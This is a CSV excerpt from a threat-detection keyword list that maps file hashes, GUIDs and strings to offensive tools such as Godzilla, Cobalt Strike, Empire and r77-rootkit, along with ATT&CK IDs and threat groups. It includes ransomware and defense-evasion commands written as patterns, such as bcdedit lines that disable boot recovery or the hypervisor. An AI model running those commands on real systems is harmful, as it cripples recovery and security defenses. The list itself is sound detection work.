"*bcaf32b547ce962291c3e905b9fe6dd2df389b19da01dedff9bd7b2bb5b71039*",".{0,1000}bcaf32b547ce962291c3e905b9fe6dd2df389b19da01dedff9bd7b2bb5b71039.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","35472"
"*bcb11a82c2649c468c4b130cb209a42d63d34909373e7e34a4fd80bcfbe19222*",".{0,1000}bcb11a82c2649c468c4b130cb209a42d63d34909373e7e34a4fd80bcfbe19222.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35473"
"*bcb2e399281a97256985eae807d94d8656c0b76ab2aed4ca200e57acb3b07eea*",".{0,1000}bcb2e399281a97256985eae807d94d8656c0b76ab2aed4ca200e57acb3b07eea.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","35474"
"*bcbafa4b6f4c3897ce7705a05c10d1aa10601a2dc212cb63ff6bf80e86a2f25d*",".{0,1000}bcbafa4b6f4c3897ce7705a05c10d1aa10601a2dc212cb63ff6bf80e86a2f25d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35476"
"*BCBC884D-2D47-4138-B68F-7D425C9291F9*",".{0,1000}BCBC884D\-2D47\-4138\-B68F\-7D425C9291F9.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","#GUIDproject","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","35477"
"*bcc2_setenv*",".{0,1000}bcc2_setenv.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","35481"
"*bcc2_spawn*",".{0,1000}bcc2_spawn.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","35482"
"*bcd23b279a6821e726d190afb11762f53741de0c8ee4724925a3c908e55725b5*",".{0,1000}bcd23b279a6821e726d190afb11762f53741de0c8ee4724925a3c908e55725b5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35485"
"*bcdb12d84f9915e48e5c453e8aac9be685750e11851dea0c96967ccc61f19e57*",".{0,1000}bcdb12d84f9915e48e5c453e8aac9be685750e11851dea0c96967ccc61f19e57.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35488"
"*bcdedit /set hypervisorlaunchtype off*",".{0,1000}bcdedit\s\/set\shypervisorlaunchtype\soff.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","7","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","35492"
"*bcdedit.exe /set {default} recoveryenabled No*",".{0,1000}bcdedit\.exe\s\/set\s\{default\}\srecoveryenabled\sNo.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","N/A","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","FIN7","10","10","N/A","N/A","N/A","N/A","35495"
"*bce36da8d85f5bd0c1f0c6f922cc23f943a98cc6e5feea7d307121b68971f969*",".{0,1000}bce36da8d85f5bd0c1f0c6f922cc23f943a98cc6e5feea7d307121b68971f969.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35496"
"*BCE48DAE-232E-4B3D-B5B5-D0B29BB7E9DE*",".{0,1000}BCE48DAE\-232E\-4B3D\-B5B5\-D0B29BB7E9DE.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","35497"
"*bced4fc981001259eacc23145a5968deda2cfaf64db8e3ffebf2b6ae5bcda874*",".{0,1000}bced4fc981001259eacc23145a5968deda2cfaf64db8e3ffebf2b6ae5bcda874.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35500"
"*bcfe13901d4207db340d957052cd5175e24481a5e2c5fc15d119fadedc664755*",".{0,1000}bcfe13901d4207db340d957052cd5175e24481a5e2c5fc15d119fadedc664755.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","35503"
"*BCHASH-Rijndael-128.unverified.test-vectors.txt*",".{0,1000}BCHASH\-Rijndael\-128\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35504"
"*BCHASH-Rijndael-256.unverified.test-vectors.txt*",".{0,1000}BCHASH\-Rijndael\-256\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35505"
"*bcrossc2_load_dyn*",".{0,1000}bcrossc2_load_dyn.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","35506"
"*BC-SECURITY*",".{0,1000}BC\-SECURITY.{0,1000}","offensive_tool_keyword","Github Username","Cybersecurity Engineers and Offensive Security enthusiasts actively maintaining/updating Powershell Empire in our spare time.","T1021 - T1024 - T1027 - T1059 - T1074 - T1053","TA0008 - TA0003 - TA0006","N/A","N/A","Exploitation tool","https://github.com/BC-SECURITY","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","35507"
"*BC-SECURITY*Malleable*",".{0,1000}BC\-SECURITY.{0,1000}Malleable.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 Profiles. A collection of profiles used in different projects using Cobalt Strike & Empire.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","35508"
"*bc-security/empire*",".{0,1000}bc\-security\/empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","35509"
"*bcsecurity/empire:latest*",".{0,1000}bcsecurity\/empire\:latest.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","35510"
"*BC-SECURITY/Moriarty*",".{0,1000}BC\-SECURITY\/Moriarty.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","1","N/A","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","35511"
"*BC-SECURITY/ScriptBlock-Smuggling*",".{0,1000}BC\-SECURITY\/ScriptBlock\-Smuggling.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","1","N/A","N/A","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","35512"
"*BC-SECURITY/Starkiller*",".{0,1000}BC\-SECURITY\/Starkiller.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","10","1461","206","2025-03-25T03:30:16Z","2020-03-09T05:48:58Z","35513"
"*bd02d9315cbe275ea1057def4ddf72731ce486980ad768591796a0c112032e80*",".{0,1000}bd02d9315cbe275ea1057def4ddf72731ce486980ad768591796a0c112032e80.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35514"
"*bd08e85390117b2c3fecc447cd3009e3fff3d402e6853f5d06bf710b5cab1bca*",".{0,1000}bd08e85390117b2c3fecc447cd3009e3fff3d402e6853f5d06bf710b5cab1bca.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35516"
"*bd0f5440775fe02946ffc659425427ef167a1dd6d2993606d4376422f8d33bc4*",".{0,1000}bd0f5440775fe02946ffc659425427ef167a1dd6d2993606d4376422f8d33bc4.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","35517"
"*bd1d18a030c57cd3c5827be08135daaa3bd79a83150928ef6349d07cd12f2b3e*",".{0,1000}bd1d18a030c57cd3c5827be08135daaa3bd79a83150928ef6349d07cd12f2b3e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35520"
"*bd326bcb0c8473cbae427c5e7cdfdb9b9cdab27d0df73f67c704eeb962f8db96*",".{0,1000}bd326bcb0c8473cbae427c5e7cdfdb9b9cdab27d0df73f67c704eeb962f8db96.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35523"
"*bd346689-8ee6-40b3-858b-4ed94f08d40a*",".{0,1000}bd346689\-8ee6\-40b3\-858b\-4ed94f08d40a.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001 - T1649","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","#GUIDproject","N/A","10","7","671","109","2024-08-17T16:40:07Z","2021-06-09T22:04:18Z","35524"
"*bd3e5f1a848ec10158f529073a346f56c08a18c1e4cbfa1a85714037fe1561fe*",".{0,1000}bd3e5f1a848ec10158f529073a346f56c08a18c1e4cbfa1a85714037fe1561fe.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35525"
"*bd402defef6c6e9f3872365b7baca15d0d1ecc928eacdcae9026f93b600c58d1*",".{0,1000}bd402defef6c6e9f3872365b7baca15d0d1ecc928eacdcae9026f93b600c58d1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35526"
"*bd43503a9105de8acb54f9dc566d68f3bb7d9b75fdb2ceb5fe939d52791bfdf5*",".{0,1000}bd43503a9105de8acb54f9dc566d68f3bb7d9b75fdb2ceb5fe939d52791bfdf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35527"
"*bd4913ef724705e97369862944b14594b3e092caceb0f92c283964ec00cd08d0*",".{0,1000}bd4913ef724705e97369862944b14594b3e092caceb0f92c283964ec00cd08d0.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35528"
